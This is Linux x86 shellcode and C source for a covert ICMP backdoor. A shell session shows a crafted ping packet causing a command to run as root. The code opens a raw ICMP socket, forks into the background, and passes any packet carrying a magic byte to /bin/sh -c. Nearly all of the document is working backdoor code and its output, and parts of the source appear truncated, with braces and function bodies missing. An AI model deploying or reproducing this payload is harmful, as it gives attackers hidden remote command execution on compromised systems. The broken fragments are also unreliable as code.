main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137
main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SECRET_CHAR "\x99"
char shell[] =
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"/bin/sh -c";
void asm_code() {
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80 /* socket(); */
movl %eax,%edx
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80 /* recvfrom(); */
movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al /* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80 /* close(); */
pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
movb $0xb,%al
int $0x80 /* execve(); */
xorl %eax,%eax
incl %eax
int $0x80 /* exit(); */
call execve
.string \"/bin/sh -c\"
void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL};
fd = socket(2,3,1);
if (fork() > 0) exit(0);
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
buf[nb-1] = 0;
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
return 0;